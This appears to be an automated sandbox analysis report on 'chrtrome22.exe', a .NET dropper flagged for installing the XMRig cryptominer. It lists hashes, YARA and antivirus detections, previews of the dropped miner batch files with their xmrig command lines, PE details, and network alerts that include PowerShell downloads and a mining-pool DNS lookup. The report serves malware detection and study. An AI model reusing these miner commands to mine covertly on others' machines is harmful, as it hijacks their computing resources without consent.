                                                                          Malicious:false
                                                                          Preview::: Example batch file for mining Raptoreum at a pool.::.:: Format:.:: xmrig.exe -a gr -o <pool address>:<pool port> -u <pool username/wallet> -p <pool password>.::.:: Fields:.:: pool address The host name of the pool stratum or its IP address, for example raptoreumemporium.com.:: pool port The port of the pool's stratum to connect to, for example 3333. Check your pool's getting started page..:: pool username/wallet For most pools, this is the wallet address you want to mine to. Some pools require a username.:: pool password For most pools this can be just 'x'. For pools using usernames, you may need to provide a password as configured on the pool..::.:: List of Raptoreum mining pools:.:: https://miningpoolstats.stream/raptoreum.::.:: Choose pools outside of top 5 to help Raptoreum network be more decentralized!.:: Smaller pools also often have smaller fees/payout limits...cd /d "%~dp0".:: Use this command line to conne

                                                                          C:\xmrig\xmrig-6.22.2\solo_mine_example.cmd

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):821
                                                                          Entropy (8bit):5.147610259279037
                                                                          Encrypted:false
                                                                          SSDEEP:24:knTC6jGoTcC6gaO8oAZvfa6Tz7nR7O+ORxAIHnV+XD/X:8TdNAzOr0a6Tz7nR7OhzVwX
                                                                          MD5:090703E56F46330ED625AC4363C9D25C
                                                                          SHA1:6CE0B265E0860F1913F4BB37A17AA7EDA88641C5
                                                                          SHA-256:33497C69C21FA96BBC96F1D7F09608E462F8AB22555364977C0BD35FEF27BC29
                                                                          SHA-512:1CD8C43287508C9393300D5A22C565D2F4BD98493A203112FD727518A4E439EB74035D18FE1F52E2D3594305A841CA93FCD0E3C61634F0992CFD3FC253872F19
                                                                          Malicious:false
                                                                          Preview::: Example batch file for mining Monero solo.::.:: Format:.::.xmrig.exe -o <node address>:<node port> -a rx/0 -u <wallet address> --daemon.::.:: Fields:.::.node address..The host name of your monerod node or its IP address. It can also be a public node with RPC enabled, for example node.xmr.to.::.node port ..The RPC port of your monerod node to connect to, usually 18081..::.wallet address..Check your Monero CLI or GUI wallet to see your wallet's address..::.:: Mining solo is the best way to help Monero network be more decentralized!.:: But you will only get a payout when you find a block which can take more than a year for a single low-end PC...cd /d "%~dp0".xmrig.exe -o YOUR_NODE_IP:18081 -a rx/0 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD --daemon.pause.

                                                                          C:\xmrig\xmrig-6.22.2\start.cmd

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):44
                                                                          Entropy (8bit):4.42511855035714
                                                                          Encrypted:false
                                                                          SSDEEP:3:mKDDVBF//IyXQdAoWQIv:hyEQzIv
                                                                          MD5:EAF3A00CC0465F8AF471B849ADA29843
                                                                          SHA1:3042E97874706189AA9704D77C9E74A94E519106
                                                                          SHA-256:8E70EF38FE14A2EE2848DF3D6F7E260D1CAF8CFC15DE694D678B8AF151D62333
                                                                          SHA-512:56B9F3991AE4BAD5E06097D095931E746E6B2AC955649A5C793D9F4F6861C6FFC9316B063C34D7A8079AF201354C87BF3008BC0FD4321E59B27E1D8120B078CF
                                                                          Malicious:false
                                                                          Preview:@echo off..cd /d "%~dp0"..xmrig.exe..pause..

                                                                          C:\xmrig\xmrig-6.22.2\xmrig.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\chrtrome22.exe
                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):6412800
                                                                          Entropy (8bit):6.624511627494028
                                                                          Encrypted:false
                                                                          SSDEEP:98304:JtRK2Xvf49fuI0nBkLuFvJr4XGCkc/zF2fz5IZ4ePzpS+KdbjrD/6K+TU3nA:I2Xv42VKzYz6Z4qSndf3D+TU3A
                                                                          MD5:F6D520AE125F03056C4646C508218D16
                                                                          SHA1:F65E63D14DD57EADB262DEAA2B1A8A965A2A962C
                                                                          SHA-256:D2FCF28897DDC2137141D838B734664FF7592E03FCD467A433A51CB4976B4FB1
                                                                          SHA-512:D1EC3DA141CE504993A0CBF8EA4B719FFA40A2BE4941C18FFC64EC3F71435F7BDDADDA6032EC0AE6CADA66226EE39A2012079ED318DF389C7C6584AD3E1C334D
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: Joe Security
                                                                          • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: unknown
                                                                          • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: Florian Roth
                                                                          • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: ditekSHen
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........{S.N.=.N.=.N.=..b>.B.=..b8..=..o9.].=..o>.D.=..o8...=..b9.W.=.o9.\.=.N.<...=..b<.Y.=...9.n.=.o4.G.=.o>.M.=.o..O.=.N...O.=.o?.O.=.RichN.=.........................PE..d...))'g.........."......VB..rI.......>........@.............................0............`.................................................T.\..........Y...................p........Y.......................Y.(.....Y.8............pB.p............................text...8TB......VB................. ..`.rdata..nw...pB..x...ZB.............@..@.data.....*...\.......\.............@....pdata................].............@..@_RANDOMXV.............`.............@..`_TEXT_CN.&.......(....`.............@..`_TEXT_CN..............`.............@..`_RDATA................`.............@..@.rsrc....Y.......Z....`.............@..@.reloc.......p.......$a.............@..B........................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):5.375702856183609
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:chrtrome22.exe
                                                                          File size:13'312 bytes
                                                                          MD5:ae96b1fb65498cdf458a52bc197466a5
                                                                          SHA1:c55f2e200b34d90caddb261b971972c97648402f
                                                                          SHA256:7d54679530cec59ef4c71f059c3b6da8f654e2a316fa4689319db0ab35572880
                                                                          SHA512:de89b24bed221beaa0cb74e3ce0ec97570fe21130f35c3683540a8bc76afc10797898f410acef94d57b1cbebbd06f0e820eeb1df7d63fcdf45f7d907f6bc8c97
                                                                          SSDEEP:192:VFLcbr8jR6T4YiZ/T0YmYV526Yu3hSWrJ4aadrq8uSF3:VFLcBT4YitT0Ymeo633hLrJ4JUSF
                                                                          TLSH:25522D2CA3784256C85A8A7E8C73CF802234FD66F553E75D1CB4F1526E3235086A26F9
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....zg.............................7... ...@....@.. ....................................@................................

                                                                          File Icon

                                                                          Icon Hash:6b595171192d243b

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x4037be
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows cui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x677AC9BE [Sun Jan 5 18:04:46 2025 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x37680x53.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x1760.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x17c40x1800a9700b38ff6c5b620cd6b2c38776e5bfFalse0.6328125data5.93149859470483IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x40000x17600x1800a4cc067d0be0e7bb6585a9df2ed10dc9False0.3037109375data4.69536242285062IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x60000xc0x20098b5de85608d1a214cf8979f2e38fb3bFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x44b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.25656660412757976
                                                                          RT_GROUP_ICON0x55580x14data1.2
                                                                          RT_VERSION0x41300x37cdata0.4383408071748879
                                                                          RT_MANIFEST0x55700x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2025-01-09T08:42:10.487254+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449730140.82.121.4443TCP
                                                                          2025-01-09T08:42:11.117698+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449731185.199.110.133443TCP
                                                                          2025-01-09T08:42:14.364879+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449732172.67.144.26443TCP
                                                                          2025-01-09T08:42:15.520551+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449733206.189.156.6980TCP
                                                                          2025-01-09T08:42:15.866225+01002047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)2192.168.2.4640141.1.1.153UDP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 9, 2025 08:42:09.418879032 CET49730443192.168.2.4140.82.121.4
                                                                          Jan 9, 2025 08:42:09.418924093 CET44349730140.82.121.4192.168.2.4
                                                                          Jan 9, 2025 08:42:09.418999910 CET49730443192.168.2.4140.82.121.4
                                                                          Jan 9, 2025 08:42:09.430015087 CET49730443192.168.2.4140.82.121.4
                                                                          Jan 9, 2025 08:42:09.430028915 CET44349730140.82.121.4192.168.2.4
                                                                          Jan 9, 2025 08:42:10.086536884 CET44349730140.82.121.4192.168.2.4
                                                                          Jan 9, 2025 08:42:10.086669922 CET49730443192.168.2.4140.82.121.4
                                                                          Jan 9, 2025 08:42:10.091923952 CET49730443192.168.2.4140.82.121.4
                                                                          Jan 9, 2025 08:42:10.091938019 CET44349730140.82.121.4192.168.2.4
                                                                          Jan 9, 2025 08:42:10.092327118 CET44349730140.82.121.4192.168.2.4
                                                                          Jan 9, 2025 08:42:10.139899969 CET49730443192.168.2.4140.82.121.4
                                                                          Jan 9, 2025 08:42:10.183334112 CET44349730140.82.121.4192.168.2.4
                                                                          Jan 9, 2025 08:42:10.487267017 CET44349730140.82.121.4192.168.2.4
                                                                          Jan 9, 2025 08:42:10.487479925 CET44349730140.82.121.4192.168.2.4
                                                                          Jan 9, 2025 08:42:10.487523079 CET44349730140.82.121.4192.168.2.4
                                                                          Jan 9, 2025 08:42:10.487567902 CET49730443192.168.2.4140.82.121.4
                                                                          Jan 9, 2025 08:42:10.487612009 CET49730443192.168.2.4140.82.121.4
                                                                          Jan 9, 2025 08:42:10.490998983 CET49730443192.168.2.4140.82.121.4
                                                                          Jan 9, 2025 08:42:10.504693031 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:10.504751921 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:10.504853010 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:10.505430937 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:10.505443096 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:10.964183092 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:10.964323997 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:10.967725992 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:10.967736959 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:10.968028069 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:10.969199896 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.011347055 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.117705107 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.118194103 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.118223906 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.118366003 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.118390083 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.118393898 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.118417025 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.118432999 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.118457079 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.118880033 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.118949890 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.118979931 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.118993044 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.118998051 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.119040012 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.123049021 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.133291006 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.133393049 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.133414030 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.176731110 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.205324888 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.205431938 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.205482960 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.205509901 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.205527067 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.205593109 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.205598116 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.205634117 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.205663919 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.205673933 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.205679893 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.205718994 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.205773115 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.206217051 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.206244946 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.206264019 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.206269979 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.206309080 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.206331968 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.206396103 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.206428051 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.206438065 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.206442118 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.206480026 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.207067966 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.207222939 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.207254887 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.207285881 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.207298040 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.207303047 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.207335949 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.207345009 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.207410097 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.207415104 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.254838943 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.254869938 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.263317108 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.263379097 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.263400078 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.292016029 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.292048931 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.292062998 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.292073011 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.292094946 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.292114973 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.292119980 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.292148113 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.292160034 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.292164087 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.292198896 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.292203903 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.293294907 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.293303013 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.293319941 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.293327093 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.293333054 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.293355942 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.293360949 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.293409109 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.293442965 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.294085979 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.294122934 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.294186115 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.294192076 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.295572996 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.295593023 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.295639992 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.295644999 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.295675993 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.348611116 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.378963947 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.378976107 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.379018068 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.379035950 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.379053116 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.379087925 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.379122972 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.379625082 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.379641056 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.379693985 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.379699945 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.379731894 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.379745960 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.380383968 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.380409002 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.380459070 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.380464077 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.380507946 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.381304979 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.381325960 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.381388903 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.381395102 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.381439924 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.382230997 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.382251024 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.382318020 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.382323027 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.382378101 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.383116007 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.383131027 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.383208036 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.383213043 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.383254051 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.384057999 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.384073973 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.384156942 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.384161949 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.384207964 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.465584993 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.465605974 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:11.465682030 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:11.465699911 CET44349731185.199.110.133192.168.2.4
